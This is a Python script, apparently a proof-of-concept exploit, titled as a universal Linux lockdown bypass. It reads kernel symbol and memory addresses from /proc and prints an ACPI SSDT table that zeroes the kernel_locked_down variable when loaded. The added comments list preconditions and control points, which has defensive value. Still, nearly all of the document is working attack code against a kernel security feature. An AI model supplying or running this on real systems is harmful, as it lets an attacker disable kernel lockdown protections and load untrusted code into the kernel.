#!/usr/bin/python3
# Universal Linux lockdown bypass, thanks GRUB2 <3
#
# Generates ASL source for an SSDT and prints it to stdout. The script itself
# only reads files under /proc and writes text; it does not compile or load
# anything. It stops early unless it runs as root and unless "nokaslr" is on
# the kernel command line, and it depends on readable symbol addresses in
# /proc/kallsyms - each of those conditions is a control point worth watching
# on a system that relies on lockdown.
import os
import sys

# The Linux ACPI battery driver won't be able to resist running this :)
#
# Template with a single %x placeholder, filled in at the bottom of the file
# with the computed physical address. What the ASL declares, as written here:
#   - OperationRegion KMEM: 4 bytes of SystemMemory at that address
#   - Field LKDN: the 32-bit value at that location
#   - Device \_SB_.HACK (EisaId PNP0C0A, _UID 2) whose _INI method stores Zero
#     into LKDN whenever LKDN is nonzero
ssdt_code = """
DefinitionBlock ("trigger.aml", "SSDT", 2, "", "", 0x00001001)
{
OperationRegion (KMEM, SystemMemory, 0x%x, 4)
Field (KMEM, DWordAcc, NoLock, WriteAsZeros)
{
LKDN, 32
}
Device (\\_SB_.HACK)
{
Name(_HID, EisaId ("PNP0C0A"))
Name(_UID, 0x02)
Method(_INI)
{
If (LKDN)
{
LKDN = Zero
}
}
}
}
"""

# This only works as root
# `exit` here is the site-module builtin rather than sys.exit.
if os.getuid() != 0:
    print("This script must be run as root!", file=sys.stderr)
    exit(1)

# Make sure kernel ASLR is off
# Plain substring test on the whole command line.
with open("/proc/cmdline") as f:
    if "nokaslr" not in f.read():
        print("Please add nokaslr to /etc/default/grub", file=sys.stderr)
        exit(1)

# Get the kernel load address in physical address space
# Takes the start of the "Kernel code" range from /proc/iomem (the text before
# the first "-"). The file object is never closed explicitly. If no line
# matches, kernel_base is left unbound and the addition below raises NameError;
# if several match, the last one wins.
for line in open("/proc/iomem"):
    if "Kernel code" in line:
        kernel_base = int(line.split("-")[0].strip(), 16)

# Get the virtual address of kernel_locked_down
# Substring match, so any symbol whose name merely contains
# "kernel_locked_down" is accepted and the last such line wins; the first
# space-separated field is parsed as the hex address.
for line in open("/proc/kallsyms"):
    if "kernel_locked_down" in line:
        kernel_locked_down = int(line.split(" ")[0].strip(), 16)

# Calculate the physical address of kernel_locked_down
# Clears the high bits of the virtual address, then rebases it onto the
# physical load address. The 0x01000000 term is presumably the default kernel
# text start this mapping assumes - TODO confirm against the target kernel.
kernel_locked_down &= ~0xffffffff80000000
kernel_locked_down += (kernel_base - 0x01000000)

# Emit the finished ASL text on stdout.
print(ssdt_code %kernel_locked_down)